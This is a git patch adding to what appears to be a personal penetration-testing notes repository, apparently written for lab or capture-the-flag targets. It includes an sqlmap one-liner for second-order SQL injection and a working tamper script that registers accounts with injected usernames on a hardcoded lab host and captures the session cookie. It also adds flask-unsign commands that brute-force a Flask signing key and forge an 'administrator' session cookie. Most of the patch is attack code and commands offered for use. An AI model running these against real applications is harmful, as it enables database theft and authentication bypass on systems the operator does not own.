From bbe93ff8ff9ee678953e69a396a636b746ad3bf9 Mon Sep 17 00:00:00 2001 From: whx Date: Sun, 19 Feb 2023 20:16:49 +0100 Subject: [PATCH] sqli --- Exploits/Databases/SQLmap.md | 17 ++++++ Exploits/Databases/nmap-full.gnmap | 0 Exploits/Databases/nmap-full.nmap | 0 Exploits/Databases/nmap-full.xml | 6 ++ Exploits/Databases/second_order_tamper.py | 74 +++++++++++++++++++++++ Exploits/Python/Flask Cookies.md | 25 ++++++++ 6 files changed, 122 insertions(+) create mode 100644 Exploits/Databases/nmap-full.gnmap create mode 100644 Exploits/Databases/nmap-full.nmap create mode 100644 Exploits/Databases/nmap-full.xml create mode 100644 Exploits/Databases/second_order_tamper.py create mode 100644 Exploits/Python/Flask Cookies.md diff --git a/Exploits/Databases/SQLmap.md b/Exploits/Databases/SQLmap.md index c593919..e8a127c 100644 --- a/Exploits/Databases/SQLmap.md +++ b/Exploits/Databases/SQLmap.md @@ -2,6 +2,7 @@ * [sqlmap](https://github.com/sqlmapproject/sqlmap.git) +* [sqlmap usages](https://github.com/sqlmapproject/sqlmap/wiki/Usage) * [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) * [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet) @@ -31,6 +32,22 @@ sqlmap -u http:///site.php --forms --dump-all |--tables|Show tables| |-T|Specify table| +### Advanced Features + +#### Second Order SQL Injection + +In case of an SQL injection where the result will be visible through another resource, use a second order injection. It is even possible to use a script in beforehand to login in and get a cookie, for example. A tutorial can be found on [Le Thanh Phuc's blog](https://lethanhphuc-pk.medium.com/second-order-sql-injection-explained-with-example-f67fb199f5e5) + + +An example oneliner including a tamper script and a first and second request captured in Burpsuite +```sh +sqlmap -r $(pwd)/login.request --tamper $(pwd)/second_order_tamper.py --second-req $(pwd)/second.req -p username --proxy http://127.0.0.1:8080 --technique=U --dbms mysql +``` +The `second_order_tamper.py` can be found inside this repository. Users are created through this script by SQLmap to further login through `login.request` and read the output through `second.req` (delete the cookie from the header). The vulnerable POST parameter is `username`. + +Dump the databases, tables afterwards + + ## Other Tools ### Damn Small SQLi Scanner (DSSS) diff --git a/Exploits/Databases/nmap-full.gnmap b/Exploits/Databases/nmap-full.gnmap new file mode 100644 index 0000000..e69de29 diff --git a/Exploits/Databases/nmap-full.nmap b/Exploits/Databases/nmap-full.nmap new file mode 100644 index 0000000..e69de29 diff --git a/Exploits/Databases/nmap-full.xml b/Exploits/Databases/nmap-full.xml new file mode 100644 index 0000000..7e8a37f --- /dev/null +++ b/Exploits/Databases/nmap-full.xml @@ -0,0 +1,6 @@ + + + + + + diff --git a/Exploits/Databases/second_order_tamper.py b/Exploits/Databases/second_order_tamper.py new file mode 100644 index 0000000..1558c7a --- /dev/null +++ b/Exploits/Databases/second_order_tamper.py @@ -0,0 +1,74 @@ +#!/usr/bin/env python + +''' +The following line is an example on how to utilize the script +sqlmap -r $(pwd)/login.request --tamper $(pwd)/second_order_tamper.py \ +--second-req $(pwd)/second.req -p username --technique=U --dbms mysql +''' + +import re +import requests +from lib.core.enums import PRIORITY # Imported by SQLmap +__priority__ = PRIORITY.NORMAL + + +def dependencies(): + ''' + define dependencies + ''' + pass + + +URL = "http://10.10.212.150:8000" + + +def login_account(payload): + ''' + Create account and return the cookie + The SQLi is in the username field + ''' + proxies = {'http': 'http://127.0.0.1:8080'} + #cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"} + + params = { + "username": payload, # random.randint(100000, 99999999), # SQLi field + "email": "admin@admin.com", + "password": "password123" # Needs to be similar to '-r req.txt' + } + url = f"{URL}/register" + _ = requests.post( + url, data=params, timeout=10, # cookies=cookies, + verify=False, allow_redirects=True, proxies=proxies + ) + + url = f"{URL}/login" + response = requests.post( + url, timeout=10, data=params, # cookies=flask_cookie, + verify=False, allow_redirects=True, proxies=proxies + ) + + #print(response.headers) + flask_cookie = re.search( + 'session=(.*?);', response.headers['Set-Cookie']).group(1) + + # url = f"{URL}/logout" + # response = requests.post( + # url, timeout=10, cookies=flask_cookie, + # verify=False, allow_redirects=True, proxies=proxies + # ) + + return f"session={flask_cookie}" + + +def tamper(payload, **kwargs): + ''' + The function used by SQLmap + ''' + headers = kwargs.get("headers", {}) + headers["Cookie"] = login_account(payload) + # login_account(payload) + return payload + + +#if __name__ == "__main__": +# login_account("yo") diff --git a/Exploits/Python/Flask Cookies.md b/Exploits/Python/Flask Cookies.md new file mode 100644 index 0000000..8c00b90 --- /dev/null +++ b/Exploits/Python/Flask Cookies.md @@ -0,0 +1,25 @@ +# Flask Cookies + +They have their own structure, similar to JWT. The cookie can be decoded and encoded with and sometimes without a key. +Cookies are not encrypted but signed, so the key for the siging can sometimes be bruteforces or can be found via a wordlist. + +## Read Flask Cookie + +Using `flask-unsign` this can be done via +```sh +flask-unsign --decode --cookie '' +``` + +## Unsign the Flask Cookie + +Unsigning the cookie can be done in the following way +```sh +flask-unsign --wordlist $WORDLIST --unsign --cookie '' --no-literal-eval +``` + +## Sign the Flask Cookie + +Siging the cookie can be done via +```sh +flask-unsign --sign --cookie "{'id':0,'loggedin':True,'username':'administrator'}" --secret '' +```